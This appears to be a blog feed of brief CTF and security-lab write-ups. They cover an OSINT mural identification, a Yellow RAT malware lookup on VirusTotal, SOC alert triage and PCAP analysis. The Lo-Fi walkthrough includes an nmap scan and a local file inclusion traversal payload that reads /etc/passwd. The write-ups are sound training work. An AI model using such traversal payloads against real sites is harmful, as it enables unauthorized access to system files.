srcset="https://quixtalia.in/p/lespion-lab/1_hu_61d7ce731169127b.png 800w, https://quixtalia.in/p/lespion-lab/1.png 1138w" width="1138"></p> <h2 id="questions">Questions </h2><ul> <li>extract zip file given</li> <li>github link</li> </ul> <blockquote> <p><a class="link" href="https://github.com/EMarseille99" target="_blank" rel="noopener" >https://github.com/EMarseille99</a></p> </blockquote> <ul> <li>this are all offsec tools</li> </ul>https://quixtalia.in/p/the-crime-lab/Sat, 28 Feb 2026 23:46:21 +0000https://quixtalia.in/p/the-crime-lab/<h2 id="scenario">Scenario </h2><ul> <li>this is test</li> </ul> <h2 id="questions">Questions </h2>https://quixtalia.in/p/lo-fi-writeup/Sat, 28 Feb 2026 21:00:21 +0000https://quixtalia.in/p/lo-fi-writeup/<ul> <li>nmap scan</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">nmap -sVC -p- $IP </span></span></code></pre></td></tr></table> </div> </div><ul> <li>resultS</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) </span></span><span class="line"><span class="cl">|_http-server-header: Apache/2.2.22 (Ubuntu) </span></span><span class="line"><span class="cl">|_http-title: Lo-Fi Music </span></span><span class="line"><span class="cl">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><ul> <li> <p>check web server</p> </li> <li> <p>play around bit you will find page parameter is vulnerable to LFI</p> </li> <li> <p>traverse enough to land in root <code>/</code></p> </li> <li> <p><code>=../../../../../../../../../../../..//etc/passwd</code></p> </li> <li> <p>now flag.txt</p> </li> </ul> <hr>https://quixtalia.in/p/osint-003-hackmyvm-challenge/Fri, 27 Feb 2026 23:46:21 +0000https://quixtalia.in/p/osint-003-hackmyvm-challenge/<p>Who is she?</p> <p>Flag format: HMV{namelastname}</p> <p>Ex: HMV{johnwick}</p> <hr> <p><img alt="given" class="gallery-image" data-flex-basis="243px" data-flex-grow="101" height="486" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/1.png" width="493"></p> <p>use any image reverse site</p> <ul> <li><a class="link" href="https://picdetective.com" target="_blank" rel="noopener" >https://picdetective.com</a></li> <li><a class="link" href="https://tineye.com/" target="_blank" rel="noopener" >https://tineye.com/</a></li> <li><a class="link" href="https://images.google.com/" target="_blank" rel="noopener" >https://images.google.com/</a></li> <li><a class="link" href="https://yandex.com/images/search" target="_blank" rel="noopener" >https://yandex.com/images/search</a></li> </ul> <p><img alt="reverse search image" class="gallery-image" data-flex-basis="559px" data-flex-grow="233" height="698" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/2.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/2_hu_3e2e8711b9e52dec.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/2_hu_50c73ce8a1d1383f.png 1600w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/2.png 1627w" width="1627"></p> <p><img alt="pinterest" class="gallery-image" data-flex-basis="758px" data-flex-grow="316" height="379" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/3.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/3_hu_4e7f842dbab60597.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/3.png 1198w" width="1198"></p> <ul> <li> <p><a class="link" href="https://www.insonoro.com/noticia/57213/homenaje-a-gata-cattana-con-una-exhibicion-de-grafitis-en-la-ciudad-de-granada" target="_blank" rel="noopener" >https://www.insonoro.com/noticia/57213/homenaje-a-gata-cattana-con-una-exhibicion-de-grafitis-en-la-ciudad-de-granada</a></p> </li> <li> <p>found spanish article</p> </li> <li> <p>granada city paid tribute to passed away singer Gata Cattana</p> </li> </ul> <blockquote> <p>HMV{GataCattana}</p> </blockquote> <ul> <li>to dig bit deeper i wanted to find exact coordinate of mural</li> <li>i stumbled upon this site</li> <li><a class="link" href="https://peskpesk.com/gata-catana-23/" target="_blank" rel="noopener" >https://peskpesk.com/gata-catana-23/</a></li> </ul> <p><img alt="article https://peskpesk.com/gata-catana-23/ " class="gallery-image" data-flex-basis="394px" data-flex-grow="164" height="627" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/4.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/4_hu_a8af826dc757834f.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/4.png 1031w" width="1031"></p> <ul> <li>upon walking bit on street view</li> </ul> <p><img alt="street view" class="gallery-image" data-flex-basis="296px" data-flex-grow="123" height="743" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/5.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/5_hu_ed9fecf10296ebe2.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/5.png 919w" width="919"></p> <blockquote> <p>coordinates: 37.207969337342355, -3.620627541034744</p> </blockquote> <ul> <li>i also wanted to know time when mural was painted and by whom</li> </ul> <p><img alt="comparing old streetview footage" class="gallery-image" data-flex-basis="268px" data-flex-grow="111" height="757" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/6.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/6_hu_ab0f8004eccfe67.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/6.png 847w" width="847"></p> <ul> <li>i found yt video in same spanish article</li> </ul> <p><img alt="footage for video" class="gallery-image" data-flex-basis="235px" data-flex-grow="98" height="740" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/7.png" width="727"></p> <p><img alt="on same article mentioned above" class="gallery-image" data-flex-basis="434px" data-flex-grow="180" height="576" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/8.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/8_hu_e40dd7651d055924.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/8.png 1042w" width="1042"></p> <ul> <li>on site image name was <code>20170324-gata2.jpg</code></li> <li>exiftool does not reveal anything</li> <li>which means 24 march 2017</li> <li>using shadow map we can estimate when this artist was painting mural</li> </ul> <p><img alt="google bird eye view" class="gallery-image" data-flex-basis="348px" data-flex-grow="145" height="717" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/9.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/9_hu_b77fe1f6651565b6.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/9.png 1041w" width="1041"></p> <ul> <li>red marks location of mural</li> <li>shade is in side of wall</li> </ul> <p><img alt="shadow map" class="gallery-image" data-flex-basis="250px" data-flex-grow="104" height="738" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/10.png" width="770"></p> <ul> <li>so it should be around 4 pm - 6 pm in evening</li> </ul>https://quixtalia.in/p/yellow-rat-lab/Fri, 27 Feb 2026 23:46:21 +0000https://quixtalia.in/p/yellow-rat-lab/<h2 id="scenario">Scenario </h2><p><img alt="Scenario" class="gallery-image" data-flex-basis="1786px" data-flex-grow="744" height="151" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/1.png" srcset="https://quixtalia.in/p/yellow-rat-lab/1_hu_839eeab57494c8a.png 800w, https://quixtalia.in/p/yellow-rat-lab/1.png 1124w" width="1124"></p> <hr> <h2 id="questions">Questions </h2><p><img alt="hash" class="gallery-image" data-flex-basis="629px" data-flex-grow="262" height="316" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/2.png" srcset="https://quixtalia.in/p/yellow-rat-lab/2_hu_85a1531cd88d618f.png 800w, https://quixtalia.in/p/yellow-rat-lab/2.png 829w" width="829"></p> <ul> <li><code>30E527E45F50D2BA82865C5679A6FA998EE0A1755361AB01673950810D071C85</code></li> </ul> <p><img alt="virustotal results" class="gallery-image" data-flex-basis="391px" data-flex-grow="163" height="833" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/3.png" srcset="https://quixtalia.in/p/yellow-rat-lab/3_hu_ff883ac86548af29.png 800w, https://quixtalia.in/p/yellow-rat-lab/3.png 1359w" width="1359"></p> <ul> <li>name of the malware family that causes abnormal network traffic</li> </ul> <p><img alt="community section" class="gallery-image" data-flex-basis="1685px" data-flex-grow="702" height="133" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/4.png" srcset="https://quixtalia.in/p/yellow-rat-lab/4_hu_3ee861edff532042.png 800w, https://quixtalia.in/p/yellow-rat-lab/4.png 934w" width="934"> <a class="link" href="https://redcanary.com/blog/threat-intelligence/yellow-cockatoo/" target="_blank" rel="noopener" >https://redcanary.com/blog/threat-intelligence/yellow-cockatoo/</a></p> <ul> <li>i was expecting IOCs in article but nope</li> </ul> <p><img alt="graph after login in to virustotal" class="gallery-image" data-flex-basis="477px" data-flex-grow="198" height="478" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/5.png" srcset="https://quixtalia.in/p/yellow-rat-lab/5_hu_196abdbf85d4be08.png 800w, https://quixtalia.in/p/yellow-rat-lab/5.png 951w" width="951"></p> <ul> <li>othewise in <code>relation</code> tab</li> </ul> <p><img alt="graph" class="gallery-image" data-flex-basis="528px" data-flex-grow="220" height="445" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/6.png" srcset="https://quixtalia.in/p/yellow-rat-lab/6_hu_fe405ab7e19b3725.png 800w, https://quixtalia.in/p/yellow-rat-lab/6.png 979w" width="979"></p> <ul> <li>click on that it will lead to same</li> <li>in <code>details</code> tab</li> </ul> <p><img alt="detail section" class="gallery-image" data-flex-basis="537px" data-flex-grow="224" height="369" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/7.png" srcset="https://quixtalia.in/p/yellow-rat-lab/7_hu_2a974a7d0b96d4e7.png 800w, https://quixtalia.in/p/yellow-rat-lab/7.png 827w" width="827"></p> <ul> <li>compilation timestamp of the malware</li> </ul> <p><img alt="details section" class="gallery-image" data-flex-basis="505px" data-flex-grow="210" height="394" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/8.png" srcset="https://quixtalia.in/p/yellow-rat-lab/8_hu_7b6bb9263df56d0d.png 800w, https://quixtalia.in/p/yellow-rat-lab/8.png 830w" width="830"></p> <ul> <li>When was the malware first submitted to VirusTotal</li> </ul> <p><img alt="details section" class="gallery-image" data-flex-basis="754px" data-flex-grow="314" height="232" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/9.png" width="729"></p> <ul> <li>name of the <code>.dat</code> file that the malware dropped in the AppData folder</li> <li>read red canary article</li> </ul> <p><img alt="red canary article" class="gallery-image" data-flex-basis="942px" data-flex-grow="392" height="297" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/10.png" srcset="https://quixtalia.in/p/yellow-rat-lab/10_hu_64ad66050235df8b.png 800w, https://quixtalia.in/p/yellow-rat-lab/10.png 1166w" width="1166"></p> <ul> <li>C2 server that the malware is communicating with?</li> </ul> <p><img alt="red canary article" class="gallery-image" data-flex-basis="533px" data-flex-grow="222" height="350" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/11.png" width="778"></p>https://quixtalia.in/p/first-shift-ctf-tryhackme/Sun, 24 Aug 2025 00:00:00 +0000https://quixtalia.in/p/first-shift-ctf-tryhackme/<h2 id="probably-just-fine">Probably Just Fine </h2><ul> <li>Unusual VPN login of <a class="link" href="mailto:susan.martin@probablyfine.thm" >susan.martin@probablyfine.thm</a> from 37.19.201.132 (Singapore)</li> <li>Susan from Marketing is in Singapore, attending a security vendor conference</li> <li>TryDetectThis</li> </ul> <p><img class="gallery-image" data-flex-basis="643px" data-flex-grow="267" height="602" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/first-shift-ctf-tryhackme/image.png" srcset="https://quixtalia.in/p/first-shift-ctf-tryhackme/image_hu_2ce1371f018c450f.png 800w, https://quixtalia.in/p/first-shift-ctf-tryhackme/image_hu_8bc499fa23cbc774.png 1600w, https://quixtalia.in/p/first-shift-ctf-tryhackme/image.png 1613w" width="1613"></p> <ul> <li>she confirmed she did not log in to the company VPN</li> <li>using a public Wi-Fi hotspot at a cafe</li> <li>binary with the hash <code>b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630</code></li> </ul> <hr> <ul> <li>ASN number related to the IP? <img class="gallery-image" data-flex-basis="772px" data-flex-grow="321" height="234" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/first-shift-ctf-tryhackme/image-1.png" width="753"></li> </ul> <h2 id="phishing-books">Phishing Books </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Subject: MFA Removal Requests </span></span><span class="line"><span class="cl">From: Dr. Isabella &lt;isabella@kingford.ac.uk&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Hey, ProbablyFine SOC Team, </span></span><span class="line"><span class="cl"> I&#39;ve been getting several emails asking me to approve my MFA. </span></span><span class="line"><span class="cl"> Are you performing any tests? Should I approve these requests? </span></span><span class="line"><span class="cl"> Dr. Isabella </span></span></code></pre></td></tr></table> </div> </div>https://quixtalia.in/p/pcap-analysis-lets-defend-lab/Fri, 25 Aug 2023 00:00:00 +0000https://quixtalia.in/p/pcap-analysis-lets-defend-lab/<p><img alt="Image 1" class="gallery-image" data-flex-basis="1249px" data-flex-grow="520" height="169" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1_hu_d88d16c63c41c9a6.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1.png 880w" width="880"></p> <p><img alt="Image 2" class="gallery-image" data-flex-basis="1614px" data-flex-grow="672" height="117" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/2.png" width="787"></p> <ul> <li>follow tcp stream</li> </ul> <p><img alt="Image 3" class="gallery-image" data-flex-basis="466px" data-flex-grow="194" height="746" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3_hu_d6a12c0dd69ed175.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3.png 1450w" width="1450"></p> <p><img alt="Image 4" class="gallery-image" data-flex-basis="371px" data-flex-grow="154" height="713" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4_hu_95272f52d71efa1.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4.png 1105w" width="1105"></p> <p><img alt="Image 5" class="gallery-image" data-flex-basis="659px" data-flex-grow="274" height="499" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5_hu_8fa237f37af83da3.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5.png 1372w" width="1372"></p> <hr>https://quixtalia.in/p/hello-world/Sun, 06 Mar 2022 00:00:00 +0000https://quixtalia.in/p/hello-world/<ul> <li>Your task is to analyze the provided PCAP file to uncover how the file appeared and determine the extent of any unauthorized activity.</li> </ul> <p><img class="gallery-image" data-flex-basis="609px" data-flex-grow="254" height="277" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hello-world/image.png" width="704"></p> <hr> <h2 id="questions">Questions </h2><ul> <li>since we know this is about file</li> <li>check export object -&gt; http</li> </ul> <p><img alt="alt text" class="gallery-image" data-flex-basis="1516px" data-flex-grow="631" height="129" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hello-world/image-1.png" srcset="https://quixtalia.in/p/hello-world/image-1_hu_3ee7025e110f9359.png 800w, https://quixtalia.in/p/hello-world/image-1.png 815w" width="815"></p> <ul> <li>attacker exfiltrated /etc/passwd file to his own ip</li> </ul>